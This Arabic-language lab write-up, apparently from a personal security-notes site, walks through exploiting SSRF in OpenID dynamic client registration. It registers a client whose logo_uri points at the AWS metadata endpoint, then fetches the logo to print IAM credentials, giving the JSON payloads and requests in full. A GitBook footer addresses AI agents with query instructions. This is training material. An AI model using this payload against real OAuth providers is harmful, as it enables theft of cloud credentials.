> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/oauth-authentication/ssrf-via-openid-dynamic-client-registration.md).

# SSRF عبر التسجيل الديناميكي لعميل OpenID

### SSRF عبر التسجيل الديناميكي لعملاء OpenID

**هدف المختبر**

تعمل هذه المختبر على ميزة تسجيل عميل OpenID الديناميكية. يتم استخدام بعض البيانات التي يوفّرها العميل بشكل غير آمن من قِبل خدمة OAuth، مما يفتح الباب أمام **SSRF**.

الهدف هو استغلال هذا الخلل للوصول إلى نقطة النهاية الداخلية التالية واسترجاع السر **مفتاح الوصول إلى السحابة** من مزود OAuth:

* `HTTP://169.254.169.254/latest/meta-data/iam/security-credentials/admin/`

**الوصول الأولي**

يمكنك الاتصال بحساب مستخدم عادي:

* **المعرّف**: wiener
* **كلمة المرور**: peter

**اكتشاف OpenID**

من خلال تحليل تدفق OAuth، نحدّد نقطة نهاية تهيئة OpenID القياسية:

```bash
/.well-known/openid-configuration
```

يعرض هذا المورد جميع نقاط النهاية التي يستخدمها مزود OAuth، بما في ذلك:

{% code overflow="wrap" %}

```json
{"authorization_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/auth","claims_parameter_supported":false,"claims_supported":["sub","name","email","email_verified","sid","auth_time","iss"],"code_challenge_methods_supported":["S256"],"end_session_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/session/end","grant_types_supported":["authorization_code","refresh_token"],"id_token_signing_alg_values_supported":["HS256","ES256","EdDSA","PS256","RS256"],"issuer":"https://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net","jwks_uri":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/jwks","registration_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/reg","response_modes_supported":["form_post","fragment","query"],"response_types_supported":["code"],"scopes_supported":["openid","offline_access","profile","email"],"subject_types_supported":["public"],"token_endpoint_auth_methods_supported":["none","client_secret_basic","client_secret_jwt","client_secret_post","private_key_jwt"],"token_endpoint_auth_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"token_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/token","request_object_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"request_parameter_supported":false,"request_uri_parameter_supported":true,"require_request_uri_registration":true,"userinfo_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/me","userinfo_signing_alg_values_supported":["HS256","ES256","EdDSA","PS256","RS256"],"introspection_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/token/introspection","introspection_endpoint_auth_methods_supported":["none","client_secret_basic","client_secret_jwt","client_secret_post","private_key_jwt"],"introspection_endpoint_auth_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"revocation_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/token/revocation","revocation_endpoint_auth_methods_supported":["none","client_secret_basic","client_secret_jwt","client_secret_post","private_key_jwt"],"revocation_endpoint_auth_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"claim_types_supported":["normal"]}
```

{% endcode %}

* `نقطة نهاية التفويض`
* `نقطة نهاية الرمز`
* `نقطة نهاية معلومات المستخدم`
* **`نقطة نهاية التسجيل`**

الحقل الرئيسي هنا هو:

```
/reg
```

<figure><img src="/files/af9825b388a4eab59c1358fa59927212658efe9e" alt=""><figcaption></figcaption></figure>

تتيح التسجيل الديناميكي لعملاء جدد.

```http
{
    "application_type": "web",
    "redirect_uris": [
        "https://client-app.com/callback",
        "https://client-app.com/callback2"
        ],
    "client_name": "تطبيقي",
    "logo_uri": "https://client-app.com/logo.png",
    "token_endpoint_auth_method": "client_secret_basic",
    "jwks_uri": "https://client-app.com/my_public_keys.jwks",
    "userinfo_encrypted_response_alg": "RSA1_5",
    "userinfo_encrypted_response_enc": "A128CBC-HS256",
    …
}
```

**تسجيل عميل OAuth**

يتم اعتراض استعلام إلى `/reg` ويُحوَّل إلى **طلب POST** استعلام مع الترويسة:

```http
Content-Type: application/json
```

يعمل الحد الأدنى من التسجيل مع JSON بسيط جدًا:

```json
{
    "redirect_uris": [
        "https://test.com"
        ]
}
```

يرد الخادم بإنشاء تطبيق OAuth جديد ويُرجع تحديدًا:

* `client_id`
* `client_secret`
* `registration_client_uri`
* `registration_access_token`

هذا يؤكد أن التسجيل الديناميكي نشط وغير مقيّد.

{% code overflow="wrap" %}

```json
{"application_type":"web","grant_types":["authorization_code"],"id_token_signed_response_alg":"RS256","post_logout_redirect_uris":[],"require_auth_time":false,"response_types":["code"],"subject_type":"public","token_endpoint_auth_method":"client_secret_basic","introspection_endpoint_auth_method":"client_secret_basic","revocation_endpoint_auth_method":"client_secret_basic","require_signed_request_object":false,"request_uris":[],"client_id_issued_at":1767127526,"client_id":"TL-B3vvYBc42Yju2-uZqV","client_secret_expires_at":0,"client_secret":"RVzHE-YNMkqwYdhd76jdL92wmVCNdV7Ir3z4QtEM3m2lptEEZJEbl-JxCuz7UogeAtpIFlxSqGp-GnHARBZBEQ","redirect_uris":["https://test.com"],"registration_client_uri":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/reg/TL-B3vvYBc42Yju2-uZqV","registration_access_token":"On2Y_5DyRBtlz4QPmRbTogHoSp8ihSvLTC_ntt6c6Vz"}
```

{% endcode %}

<figure><img src="/files/02f3fab8ff08970761058572a35b8c3c6930f44e" alt=""><figcaption></figcaption></figure>

**حقن SSRF عبر `logo_uri`**

الـ `logo_uri` الحقل، المصمم لتحميل صورة مرتبطة بالعميل، مثير للاهتمام بشكل خاص. / يتم استرجاعه على جانب الخادم دون التحقق الصارم من عنوان URL.

يتم تسجيل عميل جديد مع `logo_uri` يشير إلى عنوان IP الداخلي لـ AWS:

```json
{
  "redirect_uris": [
    "https://jord4n.pro"
  ],
  "logo_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
}
```

يقبل الخادم الطلب ويُرجع جديدًا `client_id`.

**الوصول إلى شعار العميل**

لدى كل عميل نقطة نهاية لاسترجاع شعاره:

```
GET /client/<client_id>/logo
```

<figure><img src="/files/c7601c4541ec169406a6804bae5536ad45e7ae5e" alt=""><figcaption></figcaption></figure>

```http
GET /client/1767128152/logo
```

<figure><img src="/files/b398bb2213df1ae5c90d0ebb54e1734f27f63609" alt=""><figcaption></figcaption></figure>

باستخدام `client_id` المتحصل عليه سابقًا:

```http
GET /client/4skHDyCgn9b1zvT-JBTin/logo
```

**استخراج بيانات تعريف AWS**

لا تتضمن الاستجابة صورة، بل تتضمن مباشرة \*\*بيانات اعتماد IAM الداخلية\*\*:

```json
{
  "Code" : "Success",
  "LastUpdated" : "2025-12-31T18:55:47.398604832Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "TKrZh1liWrDBDSltdlG9",
  "SecretAccessKey" : "pY0oqQBOuKYc77nrZrFHriyySRf12bPnf4EyBTd0",
  "Token" : "nGndN1NnGYkE6XEumqF4iZiD7qqa1VyOXSm5T6I7VRolft4b6Hc2zppqjZJFIhPJH0ZhTAYfoUe8edUbDvDkLjd0idSJlJggjp6BZAjEOqsSFHAZ9qBXUur878LdUfxk12joCYbDYYcpw0y5tHNIHx7sqZaEUlv0tukYqgVXwjweiVr2aahtizQl58akErD0kFUdqEe0YDhWwRigaSAKGdDsMKNOK5SX8iwpK8Vq6mBy45Xkrx4Xt4ZC8XPn6ulX",
  "Expiration" : "2031-12-30T18:55:47.398604832Z"
}
```

`SecretAccessKey` هي القيمة المتوقعة للتحقق من المختبر.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/oauth-authentication/ssrf-via-openid-dynamic-client-registration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
